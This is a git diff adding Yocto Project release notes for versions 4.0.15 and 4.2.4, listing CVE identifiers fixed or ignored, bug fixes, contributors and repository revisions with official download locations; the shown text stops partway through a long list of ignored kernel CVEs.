b/poky/documentation/migration-guides/release-notes-4.0.15.rst @@ -0,0 +1,189 @@ +.. SPDX-License-Identifier: CC-BY-SA-2.0-UK + +Release notes for Yocto-4.0.15 (Kirkstone) +------------------------------------------ + +Security Fixes in Yocto-4.0.15 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +- avahi: Fix :cve:`2023-1981`, :cve:`2023-38469`, :cve:`2023-38470`, :cve:`2023-38471`, :cve:`2023-38472` and :cve:`2023-38473` +- binutils: Fix :cve:`2022-47007`, :cve:`2022-47010` and :cve:`2022-48064` +- bluez5: Fix :cve:`2023-45866` +- ghostscript: Ignore GhostPCL :cve:`2023-38560` +- gnutls: Fix :cve:`2023-5981` +- go: Ignore :cve:`2023-45283` and :cve:`2023-45284` +- grub: Fix :cve:`2023-4692` and :cve:`2023-4693` +- gstreamer1.0-plugins-bad: Fix :cve_mitre:`2023-44429` +- libsndfile: Fix :cve:`2022-33065` +- libwebp: Fix :cve:`2023-4863` +- openssl: Fix :cve:`2023-5678` +- python3-cryptography: Fix :cve:`2023-49083` +- qemu: Fix :cve:`2023-1544` +- sudo: :cve:`2023-42456` and :cve_mitre:`2023-42465` +- tiff: Fix :cve:`2023-41175` +- vim: Fix :cve:`2023-46246`, :cve:`2023-48231`, :cve:`2023-48232`, :cve:`2023-48233`, :cve:`2023-48234`, :cve:`2023-48235`, :cve:`2023-48236`, :cve:`2023-48237` and :cve:`2023-48706` +- xserver-xorg: Fix :cve:`2023-5367` and :cve:`2023-5380` +- xwayland: Fix :cve:`2023-5367` + + +Fixes in Yocto-4.0.15 +~~~~~~~~~~~~~~~~~~~~~ + +- bash: changes to SIGINT handler while waiting for a child +- bitbake: Fix disk space monitoring on cephfs +- bitbake: bitbake-getvar: Make --quiet work with --recipe +- bitbake: runqueue.py: fix PSI check logic +- bitbake: runqueue: Add pressure change logging +- bitbake: runqueue: convert deferral messages from bb.note to bb.debug +- bitbake: runqueue: fix PSI check calculation +- bitbake: runqueue: show more pressure data +- bitbake: runqueue: show number of currently running bitbake threads when pressure changes +- bitbake: tinfoil: Do not fail when logging is disabled and full config is used +- build-appliance-image: Update to kirkstone head revision +- cve-check: don't warn if a patch is remote +- cve-check: slightly more verbose warning when adding the same package twice +- cve-check: sort the package list in the JSON report +- cve-exclusion_5.10.inc: update for 5.10.202 +- go: Fix issue in DNS resolver +- goarch: Move Go architecture mapping to a library +- gstreamer1.0-plugins-base: enable glx/opengl support +- linux-yocto/5.10: update to v5.10.202 +- manuals: update class references +- migration-guide: add release notes for 4.0.14 +- native: Clear TUNE_FEATURES/ABIEXTENSION +- openssh: drop sudo from ptest dependencies +- overview-manual: concepts: Add Bitbake Tasks Map +- poky.conf: bump version for 4.0.15 +- python3-jinja2: Fixed ptest result output as per the standard +- ref-manual: classes: explain cml1 class name +- ref-manual: update :term:`SDK_NAME` variable documentation +- ref-manual: variables: add :term:`RECIPE_MAINTAINER` +- ref-manual: variables: document OEQA_REPRODUCIBLE_* variables +- ref-manual: variables: mention new CDN for :term:`SSTATE_MIRRORS` +- rust-common: Set llvm-target correctly for cross SDK targets +- rust-cross-canadian: Fix ordering of target json config generation +- rust-cross/rust-common: Merge arm target handling code to fix cross-canadian +- rust-cross: Simplfy the rust_gen_target calls +- rust-llvm: Allow overriding LLVM target archs +- sdk-manual: extensible.rst: remove instructions for using SDK functionality directly in a yocto build +- sudo: upgrade to 1.9.15p2 +- systemtap_git: fix used uninitialized error +- vim: Improve locale handling +- vim: Upgrade to 9.0.2130 +- vim: use upstream generated .po files + + +Known Issues in Yocto-4.0.15 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +- N/A + + +Contributors to Yocto-4.0.15 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +- Alexander Kanavin +- Archana Polampalli +- BELHADJ SALEM Talel +- Bruce Ashfield +- Chaitanya Vadrevu +- Chen Qi +- Deepthi Hemraj +- Denys Dmytriyenko +- Hitendra Prajapati +- Lee Chee Yang +- Li Wang +- Martin Jansa +- Meenali Gupta +- Michael Opdenacker +- Mikko Rapeli +- Narpat Mali +- Niko Mauno +- Ninad Palsule +- Niranjan Pradhan +- Paul Eggleton +- Peter Kjellerstedt +- Peter Marko +- Richard Purdie +- Ross Burton +- Samantha Jalabert +- Sanjana +- Soumya Sambu +- Steve Sakoman +- Tim Orling +- Vijay Anusuri +- Vivek Kumbhar +- Wenlin Kang +- Yogita Urade + + +Repositories / Downloads for Yocto-4.0.15 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +poky + +- Repository Location: :yocto_git:`/poky` +- Branch: :yocto_git:`kirkstone </poky/log/?h=kirkstone>` +- Tag: :yocto_git:`yocto-4.0.15 </poky/log/?h=yocto-4.0.15>` +- Git Revision: :yocto_git:`755632c2fcab43aa05cdcfa529727064b045073c </poky/commit/?id=755632c2fcab43aa05cdcfa529727064b045073c>` +- Release Artefact: poky-755632c2fcab43aa05cdcfa529727064b045073c +- sha: b40b43bd270d21a420c399981f9cfe0eb999f15e051fc2c89d124f249cdc0bd5 +- Download Locations: + http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.15/poky-755632c2fcab43aa05cdcfa529727064b045073c.tar.bz2 + http://mirrors.kernel.org/yocto/yocto/yocto-4.0.15/poky-755632c2fcab43aa05cdcfa529727064b045073c.tar.bz2 + +openembedded-core + +- Repository Location: :oe_git:`/openembedded-core` +- Branch: :oe_git:`kirkstone </openembedded-core/log/?h=kirkstone>` +- Tag: :oe_git:`yocto-4.0.15 </openembedded-core/log/?h=yocto-4.0.15>` +- Git Revision: :oe_git:`eea685e1caafd8e8121006d3f8b5d0b8a4f2a933 </openembedded-core/commit/?id=eea685e1caafd8e8121006d3f8b5d0b8a4f2a933>` +- Release Artefact: oecore-eea685e1caafd8e8121006d3f8b5d0b8a4f2a933 +- sha: ddc3d4a2c8a097f2aa7132ae716affacc44b119c616a1eeffb7db56caa7fc79e +- Download Locations: + http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.15/oecore-eea685e1caafd8e8121006d3f8b5d0b8a4f2a933.tar.bz2 + http://mirrors.kernel.org/yocto/yocto/yocto-4.0.15/oecore-eea685e1caafd8e8121006d3f8b5d0b8a4f2a933.tar.bz2 + +meta-mingw + +- Repository Location: :yocto_git:`/meta-mingw` +- Branch: :yocto_git:`kirkstone </meta-mingw/log/?h=kirkstone>` +- Tag: :yocto_git:`yocto-4.0.15 </meta-mingw/log/?h=yocto-4.0.15>` +- Git Revision: :yocto_git:`f6b38ce3c90e1600d41c2ebb41e152936a0357d7 </meta-mingw/commit/?id=f6b38ce3c90e1600d41c2ebb41e152936a0357d7>` +- Release Artefact: meta-mingw-f6b38ce3c90e1600d41c2ebb41e152936a0357d7 +- sha: 7d57167c19077f4ab95623d55a24c2267a3a3fb5ed83688659b4c03586373b25 +- Download Locations: + http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.15/meta-mingw-f6b38ce3c90e1600d41c2ebb41e152936a0357d7.tar.bz2 + http://mirrors.kernel.org/yocto/yocto/yocto-4.0.15/meta-mingw-f6b38ce3c90e1600d41c2ebb41e152936a0357d7.tar.bz2 + +meta-gplv2 + +- Repository Location: :yocto_git:`/meta-gplv2` +- Branch: :yocto_git:`kirkstone </meta-gplv2/log/?h=kirkstone>` +- Tag: :yocto_git:`yocto-4.0.15 </meta-gplv2/log/?h=yocto-4.0.15>` +- Git Revision: :yocto_git:`d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a </meta-gplv2/commit/?id=d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a>` +- Release Artefact: meta-gplv2-d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a +- sha: c386f59f8a672747dc3d0be1d4234b6039273d0e57933eb87caa20f56b9cca6d +- Download Locations: + http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.15/meta-gplv2-d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a.tar.bz2 + http://mirrors.kernel.org/yocto/yocto/yocto-4.0.15/meta-gplv2-d2f8b5cdb285b72a4ed93450f6703ca27aa42e8a.tar.bz2 + +bitbake + +- Repository Location: :oe_git:`/bitbake` +- Branch: :oe_git:`2.0 </bitbake/log/?h=2.0>` +- Tag: :oe_git:`yocto-4.0.15 </bitbake/log/?h=yocto-4.0.15>` +- Git Revision: :oe_git:`42a1c9fe698a03feb34c5bba223c6e6e0350925b </bitbake/commit/?id=42a1c9fe698a03feb34c5bba223c6e6e0350925b>` +- Release Artefact: bitbake-42a1c9fe698a03feb34c5bba223c6e6e0350925b +- sha: 64c684ccd661fa13e25c859dfc68d66bec79281da0f4f81b0d6a9995acb659b5 +- Download Locations: + http://downloads.yoctoproject.org/releases/yocto/yocto-4.0.15/bitbake-42a1c9fe698a03feb34c5bba223c6e6e0350925b.tar.bz2 + http://mirrors.kernel.org/yocto/yocto/yocto-4.0.15/bitbake-42a1c9fe698a03feb34c5bba223c6e6e0350925b.tar.bz2 + +yocto-docs + +- Repository Location: :yocto_git:`/yocto-docs` +- Branch: :yocto_git:`kirkstone </yocto-docs/log/?h=kirkstone>` +- Tag: :yocto_git:`yocto-4.0.15 </yocto-docs/log/?h=yocto-4.0.15>` +- Git Revision: :yocto_git:`08fda7a5601393617b1ecfe89229459e14a90b1d </yocto-docs/commit/?id=08fda7a5601393617b1ecfe89229459e14a90b1d>` + diff --git a/poky/documentation/migration-guides/release-notes-4.2.4.rst b/poky/documentation/migration-guides/release-notes-4.2.4.rst new file mode 100644 index 0000000000..3c20140e29 --- /dev/null +++ b/poky/documentation/migration-guides/release-notes-4.2.4.rst @@ -0,0 +1,364 @@ +.. SPDX-License-Identifier: CC-BY-SA-2.0-UK + +Release notes for Yocto-4.2.4 (Mickledore) +------------------------------------------ + +Security Fixes in Yocto-4.2.4 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +- bind: Fix :cve:`2023-3341` and :cve:`2023-4236` +- binutils: Fix :cve:`2023-39128` +- cups: fix :cve:`2023-4504` +- curl: Fix :cve:`2023-28320`, :cve:`2023-32001`, :cve:`2023-38039`, :cve:`2023-38545` and :cve:`2023-38546` +- dmidecode: fix for :cve:`2023-30630` +- dropbear: fix :cve:`2023-36328` +- ffmpeg: Ignore :cve:`2023-39018` +- gcc: Fix :cve:`2023-4039` +- gdb: Fix :cve:`2023-39128` +- ghostscript: Fix :cve:`2023-38559` and :cve:`2023-43115` +- glibc: Fix :cve:`2023-4527` and :cve:`2023-4806` +- go: Fix :cve:`2023-29409` and :cve:`2023-39533` +- grub: Fix :cve:`2023-4692` and :cve:`2023-4693` +- gstreamer: Fix :cve_mitre:`2023-40474`, :cve_mitre:`2023-40475` and :cve_mitre:`2023-40476` +- inetutils: fix :cve:`2023-40303` +- librsvg: Fix :cve:`2023-38633` +- libssh2: Fix :cve:`2020-22218` +- libwebp: Fix :cve:`2023-4863` and :cve:`2023-5129` +- libx11: Fix :cve:`2023-43785`, :cve:`2023-43786` and :cve:`2023-43787` +- libxpm: Fix :cve:`2023-43788` and :cve:`2023-43789` +- linux-yocto/6.1: Ignore :cve:`2003-1604`, :cve:`2004-0230`, :cve:`2006-3635`, :cve:`2006-5331`, :cve:`2006-6128`, :cve:`2007-4774`, :cve:`2007-6761`, :cve:`2007-6762`, :cve:`2008-7316`, :cve:`2009-2692`, :cve:`2010-0008`, :cve:`2010-3432`, :cve:`2010-4648`, :cve:`2010-5313`, :cve:`2010-5328`, :cve:`2010-5329`, :cve:`2010-5331`, :cve:`2010-5332`, :cve:`2011-4098`, :cve:`2011-4131`, :cve:`2011-4915`, :cve:`2011-5321`, :cve:`2011-5327`, :cve:`2012-0957`, :cve:`2012-2119`, :cve:`2012-2136`, :cve:`2012-2137`, :cve:`2012-2313`, :cve:`2012-2319`, :cve:`2012-2372`, :cve:`2012-2375`, :cve:`2012-2390`, :cve:`2012-2669`, :cve:`2012-2744`, :cve:`2012-2745`, :cve:`2012-3364`, :cve:`2012-3375`, :cve:`2012-3400`, :cve:`2012-3412`, :cve:`2012-3430`, :cve:`2012-3510`, :cve:`2012-3511`, :cve:`2012-3520`, :cve:`2012-3552`, :cve:`2012-4398`, :cve:`2012-4444`, :cve:`2012-4461`, :cve:`2012-4467`, :cve:`2012-4508`, :cve:`2012-4530`, :cve:`2012-4565`, :cve:`2012-5374`, :cve:`2012-5375`, :cve:`2012-5517`, :cve:`2012-6536`, :cve:`2012-6537`, :cve:`2012-6538`, :cve:`2012-6539`, :cve:`2012-6540`, :cve:`2012-6541`, :cve:`2012-6542`, :cve:`2012-6543`, :cve:`2012-6544`, :cve:`2012-6545`, :cve:`2012-6546`, :cve:`2012-6547`, :cve:`2012-6548`, :cve:`2012-6549`, :cve:`2012-6638`, :cve:`2012-6647`, :cve:`2012-6657`, :cve:`2012-6689`, :cve:`2012-6701`, :cve:`2012-6703`, :cve:`2012-6704`, :cve:`2012-6712`, :cve:`2013-0160`, :cve:`2013-0190`, :cve:`2013-0216`, :cve:`2013-0217`, :cve:`2013-0228`, :cve:`2013-0231`, :cve:`2013-0268`, :cve:`2013-0290`, :cve:`2013-0309`, :cve:`2013-0310`, :cve:`2013-0311`, :cve:`2013-0313`, :cve:`2013-0343`, :cve:`2013-0349`, :cve:`2013-0871`, :cve:`2013-0913`, :cve:`2013-0914`, :cve:`2013-1059`, :cve:`2013-1763`, :cve:`2013-1767`, :cve:`2013-1772`, :cve:`2013-1773`, :cve:`2013-1774`, :cve:`2013-1792`, :cve:`2013-1796`, :cve:`2013-1797`, :cve:`2013-1798`, :cve:`2013-1819`, :cve:`2013-1826`, :cve:`2013-1827`, :cve:`2013-1828`, :cve:`2013-1848`, :cve:`2013-1858`, :cve:`2013-1860`, :cve:`2013-1928`, :cve:`2013-1929`, :cve:`2013-1943`, :cve:`2013-1956`, :cve:`2013-1957`, :cve:`2013-1958`, :cve:`2013-1959`, :cve:`2013-1979`, :cve:`2013-2015`, :cve:`2013-2017`, :cve:`2013-2058`, :cve:`2013-2094`, :cve:`2013-2128`, :cve:`2013-2140`, :cve:`2013-2141`, :cve:`2013-2146`, :cve:`2013-2147`, :cve:`2013-2148`, :cve:`2013-2164`, :cve:`2013-2206`, :cve:`2013-2232`, :cve:`2013-2234`, :cve:`2013-2237`, :cve:`2013-2546`, :cve:`2013-2547`, :cve:`2013-2548`, :cve:`2013-2596`, :cve:`2013-2634`, :cve:`2013-2635`, :cve:`2013-2636`, :cve:`2013-2850`, :cve:`2013-2851`, :cve:`2013-2852`, :cve:`2013-2888`, :cve:`2013-2889`, :cve:`2013-2890`, :cve:`2013-2891`, :cve:`2013-2892`, :cve:`2013-2893`, :cve:`2013-2894`, :cve:`2013-2895`, :cve:`2013-2896`, :cve:`2013-2897`, :cve:`2013-2898`, :cve:`2013-2899`, :cve:`2013-2929`, :cve:`2013-2930`, :cve:`2013-3076`, :cve:`2013-3222`, :cve:`2013-3223`, :cve:`2013-3224`, :cve:`2013-3225`, :cve:`2013-3226`, :cve:`2013-3227`, :cve:`2013-3228`, :cve:`2013-3229`, :cve:`2013-3230`, :cve:`2013-3231`, :cve:`2013-3232`, :cve:`2013-3233`, :cve:`2013-3234`, :cve:`2013-3235`, :cve:`2013-3236`, :cve:`2013-3237`, :cve:`2013-3301`, :cve:`2013-3302`, :cve:`2013-4125`, :cve:`2013-4127`, :cve:`2013-4129`, :cve:`2013-4162`, :cve:`2013-4163`, :cve:`2013-4205`, :cve:`2013-4220`, :cve:`2013-4247`, :cve:`2013-4254`, :cve:`2013-4270`, :cve:`2013-4299`, :cve:`2013-4300`, :cve:`2013-4312`, :cve:`2013-4343`, :cve:`2013-4345`, :cve:`2013-4348`, :cve:`2013-4350`, :cve:`2013-4387`, :cve:`2013-4470`, :cve:`2013-4483`, :cve:`2013-4511`, :cve:`2013-4512`, :cve:`2013-4513`, :cve:`2013-4514`, :cve:`2013-4515`, :cve:`2013-4516`, :cve:`2013-4563`, :cve:`2013-4579`, :cve:`2013-4587`, :cve:`2013-4588`, :cve:`2013-4591`, :cve:`2013-4592`, :cve:`2013-5634`, :cve:`2013-6282`, :cve:`2013-6367`, :cve:`2013-6368`, :cve:`2013-6376`, :cve:`2013-6378`, :cve:`2013-6380`, :cve:`2013-6381`, :cve:`2013-6382`, :cve:`2013-6383`, :cve:`2013-6431`, :cve:`2013-6432`, :cve:`2013-6885`, :cve:`2013-7026`, :cve:`2013-7027`, :cve:`2013-7263`, :cve:`2013-7264`, :cve:`2013-7265`, :cve:`2013-7266`, :cve:`2013-7267`, :cve:`2013-7268`, :cve:`2013-7269`, :cve:`2013-7270`, :cve:`2013-7271`, :cve:`2013-7281`, :cve:`2013-7339`, :cve:`2013-7348`, :cve:`2013-7421`, :cve:`2013-7446`, :cve:`2013-7470`, :cve:`2014-0038`, :cve:`2014-0049`, :cve:`2014-0055`, :cve:`2014-0069`, :cve:`2014-0077`, :cve:`2014-0100`, :cve:`2014-0101`, :cve:`2014-0102`, :cve:`2014-0131`, :cve:`2014-0155`, :cve:`2014-0181`, :cve:`2014-0196`, :cve:`2014-0203`, :cve:`2014-0205`, :cve:`2014-0206`, :cve:`2014-1438`, :cve:`2014-1444`, :cve:`2014-1445`, :cve:`2014-1446`, :cve:`2014-1690`, :cve:`2014-1737`, :cve:`2014-1738`, :cve:`2014-1739`, :cve:`2014-1874`, :cve:`2014-2038`, :cve:`2014-2039`, :cve:`2014-2309`, :cve:`2014-2523`, :cve:`2014-2568`, :cve:`2014-2580`, :cve:`2014-2672`, :cve:`2014-2673`, :cve:`2014-2678`, :cve:`2014-2706`, :cve:`2014-2739`, :cve:`2014-2851`, :cve:`2014-2889`, :cve:`2014-3122`, :cve:`2014-3144`, :cve:`2014-3145`, :cve:`2014-3153`, :cve:`2014-3180`, :cve:`2014-3181`, :cve:`2014-3182`, :cve:`2014-3183`, :cve:`2014-3184`, :cve:`2014-3185`, :cve:`2014-3186`, :cve:`2014-3534`, :cve:`2014-3535`, :cve:`2014-3601`, :cve:`2014-3610`, :cve:`2014-3611`, :cve:`2014-3631`, :cve:`2014-3645`, :cve:`2014-3646`, :cve:`2014-3647`, :cve:`2014-3673`, :cve:`2014-3687`, :cve:`2014-3688`, :cve:`2014-3690`, :cve:`2014-3917`, :cve:`2014-3940`, :cve:`2014-4014`, :cve:`2014-4027`, :cve:`2014-4157`, :cve:`2014-4171`, :cve:`2014-4508`, :cve:`2014-4608`, :cve:`2014-4611`, :cve:`2014-4652`, :cve:`2014-4653`, :cve:`2014-4654`, :cve:`2014-4655`, :cve:`2014-4656`, :cve:`2014-4667`, :cve:`2014-4699`, :cve:`2014-4943`, :cve:`2014-5045`, :cve:`2014-5077`, :cve:`2014-5206`, :cve:`2014-5207`, :cve:`2014-5471`, :cve:`2014-5472`, :cve:`2014-6410`, :cve:`2014-6416`, :cve:`2014-6417`, :cve:`2014-6418`, :cve:`2014-7145`, :cve:`2014-7283`, :cve:`2014-7284`, :cve:`2014-7822`, :cve:`2014-7825`, :cve:`2014-7826`, :cve:`2014-7841`, :cve:`2014-7842`, :cve:`2014-7843`, :cve:`2014-7970`, :cve:`2014-7975`, :cve:`2014-8086`, :cve:`2014-8133`, :cve:`2014-8134`, :cve:`2014-8159`, :cve:`2014-8160`, :cve:`2014-8171`, :cve:`2014-8172`, :cve:`2014-8173`, :cve:`2014-8369`, :cve:`2014-8480`, :cve:`2014-8481`, :cve:`2014-8559`, :cve:`2014-8709`, :cve:`2014-8884`, :cve:`2014-8989`, :cve:`2014-9090`, :cve:`2014-9322`, :cve:`2014-9419`, :cve:`2014-9420`, :cve:`2014-9428`, :cve:`2014-9529`, :cve:`2014-9584`, :cve:`2014-9585`, :cve:`2014-9644`, :cve:`2014-9683`, :cve:`2014-9710`, :cve:`2014-9715`, :cve:`2014-9717`, :cve:`2014-9728`, :cve:`2014-9729`, :cve:`2014-9730`, :cve:`2014-9731`, :cve:`2014-9803`, :cve:`2014-9870`, :cve:`2014-9888`, :cve:`2014-9895`, :cve:`2014-9903`, :cve:`2014-9904`, :cve:`2014-9914`, :cve:`2014-9922`, :cve:`2014-9940`, :cve:`2015-0239`, :cve:`2015-0274`, :cve:`2015-0275`, :cve:`2015-1333`, :cve:`2015-1339`, :cve:`2015-1350`, :cve:`2015-1420`, :cve:`2015-1421`, :cve:`2015-1465`, :cve:`2015-1573`, :cve:`2015-1593`, :cve:`2015-1805`, :cve:`2015-2041`, :cve:`2015-2042`, :cve:`2015-2150`, :cve:`2015-2666`, :cve:`2015-2672`, :cve:`2015-2686`, :cve:`2015-2830`, :cve:`2015-2922`, :cve:`2015-2925`, :cve:`2015-3212`, :cve:`2015-3214`, :cve:`2015-3288`, :cve:`2015-3290`, :cve:`2015-3291`, :cve:`2015-3331`, :cve:`2015-3339`, :cve:`2015-3636`, :cve:`2015-4001`, :cve:`2015-4002`, :cve:`2015-4003`, :cve:`2015-4004`, :cve:`2015-4036`, :cve:`2015-4167`, :cve:`2015-4170`, :cve:`2015-4176`, :cve:`2015-4177`, :cve:`2015-4178`, :cve:`2015-4692`, :cve:`2015-4700`, :cve:`2015-5156`, :cve:`2015-5157`, :cve:`2015-5257`, :cve:`2015-5283`, :cve:`2015-5307`, :cve:`2015-5327`, :cve:`2015-5364`, :cve:`2015-5366`, :cve:`2015-5697`, :cve:`2015-5706`, :cve:`2015-5707`, :cve:`2015-6252`, :cve:`2015-6526`, :cve:`2015-6937`, :cve:`2015-7509`, :cve:`2015-7513`, :cve:`2015-7515`, :cve:`2015-7550`, :cve:`2015-7566`, :cve:`2015-7613`, :cve:`2015-7799`, :cve:`2015-7833`, :cve:`2015-7872`, :cve:`2015-7884`, :cve:`2015-7885`, :cve:`2015-7990`, :cve:`2015-8104`, :cve:`2015-8215`, :cve:`2015-8324`, :cve:`2015-8374`, :cve:`2015-8539`, :cve:`2015-8543`, :cve:`2015-8550`, :cve:`2015-8551`, :cve:`2015-8552`, :cve:`2015-8553`, :cve:`2015-8569`, :cve:`2015-8575`, :cve:`2015-8660`, :cve:`2015-8709`, :cve:`2015-8746`, :cve:`2015-8767`, :cve:`2015-8785`, :cve:`2015-8787`, :cve:`2015-8812`, :cve:`2015-8816`, :cve:`2015-8830`, :cve:`2015-8839`, :cve:`2015-8844`, :cve:`2015-8845`, :cve:`2015-8950`, :cve:`2015-8952`, :cve:`2015-8953`, :cve:`2015-8955`, :cve:`2015-8956`, :cve:`2015-8961`, :cve:`2015-8962`, :cve:`2015-8963`, :cve:`2015-8964`, :cve:`2015-8966`, :cve:`2015-8967`, :cve:`2015-8970`, :cve:`2015-9004`, :cve:`2015-9016`, :cve:`2015-9289`, :cve:`2016-0617`, :cve:`2016-0723`, :cve:`2016-0728`, :cve:`2016-0758`, :cve:`2016-0821`, :cve:`2016-0823`, :cve:`2016-10044`, :cve:`2016-10088`, :cve:`2016-10147`, :cve:`2016-10150`, :cve:`2016-10153`, :cve:`2016-10154`, :cve:`2016-10200`, :cve:`2016-10208`, :cve:`2016-10229`, :cve:`2016-10318`, :cve:`2016-10723`, :cve:`2016-10741`, :cve:`2016-10764`, :cve:`2016-10905`, :cve:`2016-10906`, :cve:`2016-10907`, :cve:`2016-1237`, :cve:`2016-1575`, :cve:`2016-1576`, :cve:`2016-1583`, :cve:`2016-2053`, :cve:`2016-2069`, :cve:`2016-2070`, :cve:`2016-2085`, :cve:`2016-2117`, :cve:`2016-2143`, :cve:`2016-2184`, :cve:`2016-2185`, :cve:`2016-2186`, :cve:`2016-2187`, :cve:`2016-2188`, :cve:`2016-2383`, :cve:`2016-2384`, :cve:`2016-2543`, :cve:`2016-2544`, :cve:`2016-2545`, :cve:`2016-2546`, :cve:`2016-2547`, :cve:`2016-2548`, :cve:`2016-2549`, :cve:`2016-2550`, :cve:`2016-2782`, :cve:`2016-2847`, :cve:`2016-3044`, :cve:`2016-3070`, :cve:`2016-3134`, :cve:`2016-3135`, :cve:`2016-3136`, :cve:`2016-3137`, :cve:`2016-3138`, :cve:`2016-3139`, :cve:`2016-3140`, :cve:`2016-3156`, :cve:`2016-3157`, :cve:`2016-3672`, :cve:`2016-3689`, :cve:`2016-3713`, :cve:`2016-3841`, :cve:`2016-3857`, :cve:`2016-3951`, :cve:`2016-3955`, :cve:`2016-3961`, :cve:`2016-4440`, :cve:`2016-4470`, :cve:`2016-4482`, :cve:`2016-4485`, :cve:`2016-4486`, :cve:`2016-4557`, :cve:`2016-4558`, :cve:`2016-4565`, :cve:`2016-4568`, :cve:`2016-4569`, :cve:`2016-4578`, :cve:`2016-4580`, :cve:`2016-4581`, :cve:`2016-4794`, :cve:`2016-4805`, :cve:`2016-4913`, :cve:`2016-4951`, :cve:`2016-4997`, :cve:`2016-4998`, :cve:`2016-5195`, :cve:`2016-5243`, :cve:`2016-5244`, :cve:`2016-5400`, :cve:`2016-5412`, :cve:`2016-5696`, :cve:`2016-5728`, :cve:`2016-5828`, :cve:`2016-5829`, :cve:`2016-6130`, :cve:`2016-6136`, :cve:`2016-6156`, :cve:`2016-6162`, :cve:`2016-6187`, :cve:`2016-6197`, :cve:`2016-6198`, :cve:`2016-6213`, :cve:`2016-6327`, :cve:`2016-6480`, :cve:`2016-6516`, :cve:`2016-6786`, :cve:`2016-6787`, :cve:`2016-6828`, :cve:`2016-7039`, :cve:`2016-7042`, :cve:`2016-7097`, :cve:`2016-7117`, :cve:`2016-7425`, :cve:`2016-7910`, :cve:`2016-7911`, :cve:`2016-7912`, :cve:`2016-7913`, :cve:`2016-7914`, :cve:`2016-7915`, :cve:`2016-7916`, :cve:`2016-7917`, :cve:`2016-8399`, :cve:`2016-8405`, :cve:`2016-8630`, :cve:`2016-8632`, :cve:`2016-8633`, :cve:`2016-8636`, :cve:`2016-8645`, :cve:`2016-8646`, :cve:`2016-8650`, :cve:`2016-8655`, :cve:`2016-8658`, :cve:`2016-8666`, :cve:`2016-9083`, :cve:`2016-9084`, :cve:`2016-9120`, :cve:`2016-9178`, :cve:`2016-9191`, :cve:`2016-9313`, :cve:`2016-9555`, :cve:`2016-9576`, :cve:`2016-9588`, :cve:`2016-9604`, :cve:`2016-9685`, :cve:`2016-9754`, :cve:`2016-9755`, :cve:`2016-9756`, :cve:`2016-9777`, :cve:`2016-9793`, :cve:`2016-9794`, :cve:`2016-9806`, :cve:`2016-9919`, :cve:`2017-0605`, :cve:`2017-0627`, :cve:`2017-0750`, :cve:`2017-0786`, :cve:`2017-0861`, :cve:`2017-1000`, :cve:`2017-1000111`, :cve:`2017-1000112`, :cve:`2017-1000251`, :cve:`2017-1000252`, :cve:`2017-1000253`, :cve:`2017-1000255`, :cve:`2017-1000363`, :cve:`2017-1000364`, :cve:`2017-1000365`, :cve:`2017-1000370`, :cve:`2017-1000371`, :cve:`2017-1000379`, :cve:`2017-1000380`, :cve:`2017-1000405`, :cve:`2017-1000407`, :cve:`2017-1000410`, :cve:`2017-10661`, :cve:`2017-10662`, :cve:`2017-10663`, :cve:`2017-10810`, :cve:`2017-10911`, :cve:`2017-11089`, :cve:`2017-11176`, :cve:`2017-11472`, :cve:`2017-11473`, :cve:`2017-11600`, :cve:`2017-12134`, :cve:`2017-12146`, :cve:`2017-12153`, :cve:`2017-12154`, :cve:`2017-12168`, :cve:`2017-12188`, :cve:`2017-12190`, :cve:`2017-12192`, :cve:`2017-12193`, :cve:`2017-12762`, :cve:`2017-13080`, :cve:`2017-13166`, :cve:`2017-13167`, :cve:`2017-13168`, :cve:`2017-13215`, :cve:`2017-13216`, :cve:`2017-13220`, :cve:`2017-13305`, :cve:`2017-13686`, :cve:`2017-13695`, :cve:`2017-13715`, :cve:`2017-14051`, :cve:`2017-14106`, :cve:`2017-14140`, :cve:`2017-14156`, :cve:`2017-14340`, :cve:`2017-14489`, :cve:`2017-14497`, :cve:`2017-14954`, :cve:`2017-14991`, :cve:`2017-15102`, :cve:`2017-15115`, :cve:`2017-15116`, :cve:`2017-15121`, :cve:`2017-15126`, :cve:`2017-15127`, :cve:`2017-15128`, :cve:`2017-15129`, :cve:`2017-15265`, :cve:`2017-15274`, :cve:`2017-15299`, :cve:`2017-15306`, :cve:`2017-15537`, :cve:`2017-15649`, :cve:`2017-15868`, :cve:`2017-15951`, :cve:`2017-16525`, :cve:`2017-16526`, :cve:`2017-16527`, :cve:`2017-16528`, :cve:`2017-16529`, :cve:`2017-16530`, :cve:`2017-16531`, :cve:`2017-16532`, :cve:`2017-16533`, :cve:`2017-16534`, :cve:`2017-16535`, :cve:`2017-16536`, :cve:`2017-16537`, :cve:`2017-16538`, :cve:`2017-16643`, :cve:`2017-16644`, :cve:`2017-16645`, :cve:`2017-16646`, :cve:`2017-16647`, :cve:`2017-16648`, :cve:`2017-16649`, :cve:`2017-16650`, :cve:`2017-16911`, :cve:`2017-16912`, :cve:`2017-16913`, :cve:`2017-16914`, :cve:`2017-16939`, :cve:`2017-16994`, :cve:`2017-16995`, :cve:`2017-16996`, :cve:`2017-17052`, :cve:`2017-17053`, :cve:`2017-17448`, :cve:`2017-17449`, :cve:`2017-17450`, :cve:`2017-17558`, :cve:`2017-17712`, :cve:`2017-17741`, :cve:`2017-17805`, :cve:`2017-17806`, :cve:`2017-17807`, :cve:`2017-17852`, :cve:`2017-17853`, :cve:`2017-17854`, :cve:`2017-17855`, :cve:`2017-17856`, :cve:`2017-17857`, :cve:`2017-17862`, :cve:`2017-17863`, :cve:`2017-17864`, :cve:`2017-17975`, :cve:`2017-18017`, :cve:`2017-18075`, :cve:`2017-18079`, :cve:`2017-18174`, :cve:`2017-18193`, :cve:`2017-18200`, :cve:`2017-18202`, :cve:`2017-18203`, :cve:`2017-18204`, :cve:`2017-18208`, :cve:`2017-18216`, :cve:`2017-18218`, :cve:`2017-18221`, :cve:`2017-18222`, 